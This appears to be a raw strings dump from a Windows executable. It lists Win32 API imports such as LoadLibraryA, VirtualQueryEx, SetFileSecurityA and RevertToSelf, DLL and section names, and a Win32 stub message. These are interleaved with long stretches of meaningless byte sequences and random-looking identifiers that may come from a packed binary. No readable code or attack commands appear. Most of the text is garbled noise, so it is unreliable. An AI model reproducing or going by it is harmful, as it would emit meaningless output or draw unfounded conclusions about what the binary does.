3"3.3:3N3T3`3g3q3w3
3$3*363P3W3_3e3k3s3y3
=-=3=9=C=J=V=\=m=r=z=
3-dlnif9mjlm
3J3-_1
4)42494?4E4O4^4e4r4x4~4
4&4,42484@4H4N4~4
4#4/454;4A4
4(4.4A4s4
4$454E4O4[4e4
454;4A4^4m4
]/4A=?
<!<'<4<;<C<M<T<Y<_<v<|<
=.=4=>=D=N=T=[=
:":*:4:;:K:Q:W:e:k:q:z:
%4]V6T
5)535<5C5I5O5Z5d5j5w5~5
5%5+51585>5D5J5S5Z5`5j5p5v5|5
5#5)535=5
5!5'5-535:5A5N5Z5`5f5p5z5
5$5/565<5H5Q5W5k5w5
&+/!#&5;- 57,1=@2=:39)@;.
5C7OEAK)
#?~5Ec
;";5;H;[;n;
5t1jMF
6"6,626?6F6N6X6_6f6l6t6z6
6$6*686H6R6^6h6v6
6$717N7T7d7x7
6A<m*C.
;&;.;6;>;F;N;V;^;f;n;v;~;
<&<.<6<><F<N<V<^<f<z<
'(@!7-
@7:1 )-,5::%<;65+6 6-0
7"747@7F7L7V7`7k7q7w7
7"7&7*7.72767:7>7B7F7J7N7R7V7Z7^7b7f7j7n7r7v7z7~7
7?7E7L7R7X7b7h7s7y7
:78&Y@
?$?*?7?>?F?P?W?]?c?m?s?
+,7!'y
$<84$|;K
8(828;8B8H8N8T8
8"8(8.888B8N8U8[8l8r8z8
8&8.8<8B8I8O8[8a8k8q8w8
8"8(8H8N8T8
?#?.?8?A?H?N?T?[?a?k?t?{?
<&<,<8<><D<N<X<|<
8tt{Rj[`
91979A9K9R9_9x9
9,!3?5&>6"=
9#9)979=9F9L9R9\9i9u9
9.9N9Y9`9h9o9{9
>#>)>9>I>N>V>u>
9N9U9^9d9n9z9
AddVectoredExceptionHandler
advapi32.dll
aNT7\G
!b9(>I
Bc87rs*
 bf|1B
}bk" S)'
bvK"ol.
b^vN ^
#BxQuz
_c03 w_k4+zm62k
	CBd<|
c|E76L
;";);C;M;c;j;
CoGetComCatalog
CoInvalidateRemoteMachineBindings
comctl32.dll
CopyFileW
CoUninitialize
CreateUpDownControl
_cyrls
 \!-D >
DeleteFileA
DllCanUnloadNow
[DNr/IPB|)nik6!<
dQ7a#K1&
DrawStatusText
ej(knI
ElfRegisterEventSourceW
EnumLanguageGroupLocalesA
EnumSystemGeoID
%Eo"\]
e#'u;5V
fe3bozixku5vn 
FileTimeToSystemTime
FindFirstVolumeMountPointW
fSSN7O
GetClassInfoW
GetCommandLineA
GetConsoleAliasesW
GetConsoleTitleW
GetLongPathNameW
GetNamedPipeInfo
GetProcessHeaps
GetPropA
GetRunningObjectTable
GetTopWindow
GlobalGetAtomNameW
GlobalMemoryStatus
GlobalUnlock
=$=G=M=a=k=t=|=
g]^|>v\@
H-[5B~
hvf6fat5n+jkd
+i8/Y4
.idata
ImageList_Copy
ImageList_GetImageInfo
IsBadReadPtr
IyZ<No
I]#'+Z
kernel32.dll
Kw>7p-
L)6fmu~
 ll;Sp
LoadLibraryA
LsaLookupPrivilegeValue
lstrcmpi
_L~}]u
 lyI0O
MenuHelp
ni[C5@
=nPX.-
ole32.dll
oleaut32.dll
OSh>4\
P+hnf$
>pk3B;
poX69{B
p[Q9)hi
PQU@:q
P.rsrc
qD(,UW
^;Q%mT
}Q|tw>
QueryPerformanceFrequency
r4HNbJ
ReadDirectoryChangesW
.reloc
RequestDeviceWakeup
RevertToSelf
>||RRv['
#sax1B
sAYm&Wq
SearchPathA
SetEvent
SetFileSecurityA
SetLastError
SetSecurityInfo
SetThreadLocale
SetVolumeLabelA
ShowHideMenuCtl
S~$Lv)
>s<_Ml
{,sTEY$
This program must be run under Win32
tu8lq#e7db
t,u&E7
TYgq3I
UnmapViewOfFile
UpdateTraceA
user32.dll
_U y1B
;uyqCvM
VarCyCmpR8
VarI4FromI8
VarR4FromI8
VarUI1FromI2
VAXXp	:@
vcMY;smC
VerifyConsoleIoHandle
||;VHh
VirtualQuery
VirtualQueryEx
WaitForSingleObjectEx
WaitNamedPipeW
^wEF*qvmk
WVnx1B
x^o\n'
#+)#)'y
y/19N&aw`8
|^?yD}
yt etgx7lb64f_focx6
*Z72`I
z9s6tbo